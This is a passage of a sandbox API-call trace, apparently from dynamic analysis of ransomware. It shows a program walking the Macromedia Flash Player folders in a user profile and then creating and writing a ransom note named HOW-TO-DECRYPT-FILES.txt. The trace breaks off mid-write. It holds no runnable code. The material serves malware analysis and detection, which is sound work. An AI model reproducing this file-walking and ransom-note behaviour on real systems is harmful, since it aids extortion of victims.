[0052.028] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.028] SetErrorMode (uMode=0x0) returned 0x1 [0052.028] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", lpFilePart=0x0) returned 0x2b [0052.028] GetLastError () returned 0x12 [0052.028] SetErrorMode (uMode=0x1) returned 0x0 [0052.028] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.028] GetLastError () returned 0x12 [0052.028] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.028] GetLastError () returned 0x12 [0052.029] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.029] GetLastError () returned 0x12 [0052.029] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.029] GetLastError () returned 0x12 [0052.029] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.029] SetErrorMode (uMode=0x0) returned 0x1 [0052.029] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", lpFilePart=0x0) returned 0x38 [0052.029] GetLastError () returned 0x12 [0052.029] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.029] GetLastError () returned 0x12 [0052.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.029] GetLastError () returned 0x12 [0052.029] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", lpFilePart=0x0) returned 0x38 [0052.029] GetLastError () returned 0x12 [0052.029] SetErrorMode (uMode=0x1) returned 0x0 [0052.029] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.030] GetLastError () returned 0x12 [0052.030] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.030] GetLastError () returned 0x12 [0052.030] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.030] GetLastError () returned 0x12 [0052.030] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.030] GetLastError () returned 0x12 [0052.030] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.030] GetLastError () returned 0x12 [0052.030] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.030] SetErrorMode (uMode=0x0) returned 0x1 [0052.030] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player", lpFilePart=0x0) returned 0x38 [0052.030] GetLastError () returned 0x12 [0052.030] SetErrorMode (uMode=0x1) returned 0x0 [0052.030] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.030] GetLastError () returned 0x12 [0052.030] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.030] GetLastError () returned 0x12 [0052.031] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.031] GetLastError () returned 0x12 [0052.031] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.031] GetLastError () returned 0x12 [0052.031] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.031] GetLastError () returned 0x12 [0052.031] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.031] SetErrorMode (uMode=0x0) returned 0x1 [0052.031] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpFilePart=0x0) returned 0x47 [0052.031] GetLastError () returned 0x12 [0052.031] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.031] GetLastError () returned 0x12 [0052.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.031] GetLastError () returned 0x12 [0052.031] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpFilePart=0x0) returned 0x47 [0052.031] GetLastError () returned 0x12 [0052.031] SetErrorMode (uMode=0x1) returned 0x0 [0052.031] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.032] GetLastError () returned 0x12 [0052.032] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.032] GetLastError () returned 0x12 [0052.032] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.032] GetLastError () returned 0x12 [0052.032] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.032] GetLastError () returned 0x12 [0052.032] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.032] SetErrorMode (uMode=0x0) returned 0x1 [0052.032] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpFilePart=0x0) returned 0x47 [0052.032] GetLastError () returned 0x12 [0052.033] SetErrorMode (uMode=0x1) returned 0x0 [0052.033] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.033] GetLastError () returned 0x12 [0052.033] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.033] GetLastError () returned 0x12 [0052.033] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.033] GetLastError () returned 0x12 [0052.033] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.033] GetLastError () returned 0x12 [0052.033] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.033] SetErrorMode (uMode=0x0) returned 0x1 [0052.033] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", lpFilePart=0x0) returned 0x50 [0052.033] GetLastError () returned 0x12 [0052.033] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.033] GetLastError () returned 0x12 [0052.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.033] GetLastError () returned 0x12 [0052.033] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", lpFilePart=0x0) returned 0x50 [0052.033] GetLastError () returned 0x12 [0052.033] SetErrorMode (uMode=0x1) returned 0x0 [0052.033] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.034] GetLastError () returned 0x12 [0052.034] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.034] GetLastError () returned 0x12 [0052.034] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.034] GetLastError () returned 0x12 [0052.034] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.034] SetErrorMode (uMode=0x0) returned 0x1 [0052.034] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG", lpFilePart=0x0) returned 0x50 [0052.034] GetLastError () returned 0x12 [0052.034] SetErrorMode (uMode=0x1) returned 0x0 [0052.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\QMUSX8EG\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.035] GetLastError () returned 0x12 [0052.035] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.035] GetLastError () returned 0x12 [0052.035] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.035] GetLastError () returned 0x12 [0052.035] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.035] SetErrorMode (uMode=0x0) returned 0x1 [0052.035] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpFilePart=0x0) returned 0x47 [0052.035] GetLastError () returned 0x12 [0052.035] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.035] GetLastError () returned 0x12 [0052.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.035] GetLastError () returned 0x12 [0052.035] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpFilePart=0x0) returned 0x47 [0052.035] GetLastError () returned 0x12 [0052.035] SetErrorMode (uMode=0x1) returned 0x0 [0052.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.036] GetLastError () returned 0x12 [0052.036] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.036] GetLastError () returned 0x12 [0052.036] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.036] GetLastError () returned 0x12 [0052.036] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.036] GetLastError () returned 0x12 [0052.036] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.036] SetErrorMode (uMode=0x0) returned 0x1 [0052.037] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpFilePart=0x0) returned 0x47 [0052.037] GetLastError () returned 0x12 [0052.037] SetErrorMode (uMode=0x1) returned 0x0 [0052.037] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.037] GetLastError () returned 0x12 [0052.037] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.037] GetLastError () returned 0x12 [0052.037] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.037] GetLastError () returned 0x12 [0052.037] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.037] GetLastError () returned 0x12 [0052.037] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.037] SetErrorMode (uMode=0x0) returned 0x1 [0052.037] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpFilePart=0x0) returned 0x4f [0052.037] GetLastError () returned 0x12 [0052.037] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.037] GetLastError () returned 0x12 [0052.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.037] GetLastError () returned 0x12 [0052.037] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpFilePart=0x0) returned 0x4f [0052.037] GetLastError () returned 0x12 [0052.037] SetErrorMode (uMode=0x1) returned 0x0 [0052.038] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.038] GetLastError () returned 0x12 [0052.038] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.038] GetLastError () returned 0x12 [0052.038] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.038] GetLastError () returned 0x12 [0052.038] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.038] GetLastError () returned 0x12 [0052.038] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.038] SetErrorMode (uMode=0x0) returned 0x1 [0052.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpFilePart=0x0) returned 0x4f [0052.038] GetLastError () returned 0x12 [0052.038] SetErrorMode (uMode=0x1) returned 0x0 [0052.038] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.038] GetLastError () returned 0x12 [0052.038] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.039] GetLastError () returned 0x12 [0052.039] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.039] GetLastError () returned 0x12 [0052.039] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.039] GetLastError () returned 0x12 [0052.039] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.039] SetErrorMode (uMode=0x0) returned 0x1 [0052.039] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpFilePart=0x0) returned 0x5b [0052.039] GetLastError () returned 0x12 [0052.039] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.039] GetLastError () returned 0x12 [0052.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.039] GetLastError () returned 0x12 [0052.039] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpFilePart=0x0) returned 0x5b [0052.039] GetLastError () returned 0x12 [0052.039] SetErrorMode (uMode=0x1) returned 0x0 [0052.039] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.040] GetLastError () returned 0x12 [0052.040] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.040] GetLastError () returned 0x12 [0052.040] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.040] GetLastError () returned 0x12 [0052.040] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.040] GetLastError () returned 0x12 [0052.040] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.040] SetErrorMode (uMode=0x0) returned 0x1 [0052.040] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", lpFilePart=0x0) returned 0x5b [0052.040] GetLastError () returned 0x12 [0052.041] SetErrorMode (uMode=0x1) returned 0x0 [0052.041] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.041] GetLastError () returned 0x12 [0052.041] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.041] GetLastError () returned 0x12 [0052.041] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.041] GetLastError () returned 0x12 [0052.041] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.041] GetLastError () returned 0x12 [0052.041] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.041] SetErrorMode (uMode=0x0) returned 0x1 [0052.041] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpFilePart=0x0) returned 0x5f [0052.041] GetLastError () returned 0x12 [0052.041] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.041] GetLastError () returned 0x12 [0052.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.041] GetLastError () returned 0x12 [0052.041] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpFilePart=0x0) returned 0x5f [0052.041] GetLastError () returned 0x12 [0052.041] SetErrorMode (uMode=0x1) returned 0x0 [0052.042] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.042] GetLastError () returned 0x12 [0052.042] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.042] GetLastError () returned 0x12 [0052.042] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.042] GetLastError () returned 0x12 [0052.042] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.042] GetLastError () returned 0x12 [0052.042] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.042] SetErrorMode (uMode=0x0) returned 0x1 [0052.042] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpFilePart=0x0) returned 0x5f [0052.042] GetLastError () returned 0x12 [0052.042] SetErrorMode (uMode=0x1) returned 0x0 [0052.042] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.042] GetLastError () returned 0x12 [0052.042] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.042] GetLastError () returned 0x12 [0052.043] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.043] GetLastError () returned 0x12 [0052.043] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.043] GetLastError () returned 0x12 [0052.043] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.043] SetErrorMode (uMode=0x0) returned 0x1 [0052.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", nBufferLength=0x105, lpBuffer=0x18e698, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", lpFilePart=0x0) returned 0x6c [0052.043] GetLastError () returned 0x12 [0052.043] SetErrorMode (uMode=0x1) returned 0x0 [0052.043] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), fInfoLevelId=0x0, lpFileInformation=0x1bf7c90 | out: lpFileInformation=0x1bf7c90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b9b23c0, ftCreationTime.dwHighDateTime=0x1d2da26, ftLastAccessTime.dwLowDateTime=0xd40365d0, ftLastAccessTime.dwHighDateTime=0x1d35a59, ftLastWriteTime.dwLowDateTime=0xd40365d0, ftLastWriteTime.dwHighDateTime=0x1d35a59, nFileSizeHigh=0x0, nFileSizeLow=0x19a)) returned 1 [0052.044] GetLastError () returned 0x12 [0052.044] SetErrorMode (uMode=0x0) returned 0x1 [0052.044] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0052.044] GetLastError () returned 0x12 [0052.044] SetErrorMode (uMode=0x1) returned 0x0 [0052.044] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.044] GetLastError () returned 0x0 [0052.044] GetFileType (hFile=0x184) returned 0x1 [0052.044] SetErrorMode (uMode=0x0) returned 0x1 [0052.044] GetFileType (hFile=0x184) returned 0x1 [0052.044] WriteFile (in: hFile=0x184, lpBuffer=0x1c137f0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eaa4, 